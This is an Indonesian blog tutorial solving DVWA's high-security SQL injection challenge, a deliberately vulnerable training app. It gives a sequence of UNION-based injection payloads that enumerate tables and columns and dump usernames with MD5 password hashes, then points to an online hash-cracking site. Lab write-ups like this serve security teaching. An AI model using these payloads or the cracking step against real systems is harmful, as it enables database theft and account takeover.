Beranda / DVWA / SQL Injection

SQL Injection Challenge DVWA High Level Security

Diposting oleh Jack Wilder Posting Komentar

Oke sebelumnya kita pernah belajar dasar SQL Injection secara manual. Nah, sebenarnya jika kalian sudah paham konsepnya, challenge SQL Injection di level security High pada DVWA pun mudah untuk diselesaikan. Dan di tutorial ini saya akan sharing bagaimana cara menyelesaikan tantangan SQL Injection dengan level High di DVWA.

Sebelum melakukan SQLi, pastikan dulu level security nya di set ke High.

Jika sudah, lets gowww....

Pertama, kita tambahkan tanda petik untuk mentrigger error.

Ternyata error. Namun sayangnya tidak muncul informasi apapun di halaman errornya. Tapi tidak apa-apa, kita coba kembalikan querynya agar tidak error.

Setelah dicoba-coba, comment yang work adalah tanda pagar (#).

1'#

Setelah ketemu balancingnya, kita gas cari jumlah kolomnya.

Error di angka ke-3. Artinya jumlah kolom hanya dua.

1' order by 3#

Lanjut cari magic numbernya.

1' union select 1,2#

Oke, kita bisa gunakan nomor 1 ataupun 2 untuk memunculkan data yang ingin kita panggil. Kita verifikasi dulu pakai query basic.

1' union select 1,concat(@@version,0x3a,user())#

Oke, saatnya kita ekstrak data sensitif dari database.

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

Kita coba ekstrak kolom dari table users.

1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#

1' union select 1,group_concat(user_id,0x3a,user,0x3a,password,0x3c62723e) from users#

3c62723e sendiri merupakan bentuk hex dari <br>.

1' union select 0x3c68323e496e6a6563746564206279204c696e75785365633c2f68323e,group_concat(user_id,0x3a,user,0x3a,password,0x3c62723e) from users#

Data:

1:admin:5f4dcc3b5aa765d61d8327deb882cf99
,2:gordonb:e99a18c428cb38d5f260853678922e03
,3:1337:8d3533d75ae2c3966d7e0d4fcc69216b
,4:pablo:0d107d09f5bbe40cade3de5c71e9e9b7
,5:smithy:5f4dcc3b5aa765d61d8327deb882cf99

Extra

Setelah mendapatkan hash passwordnya, kita bisa coba crack menggunakan online tools seperti CrackStation.

  • https://crackstation.net/

Oke mungkin itu saja ya untuk sharing kali ini. Jangan sungkan untuk bertanya jika ada yang belum jelas. Terimakasih.

Posting Komentar untuk "SQL Injection Challenge DVWA High Level Security"

Posting Komentar

Silahkan tinggalkan komentar jika ada masukan, pertanyaan, kritik ataupun dukungan. Namun pastikan untuk berkomentar secara sopan.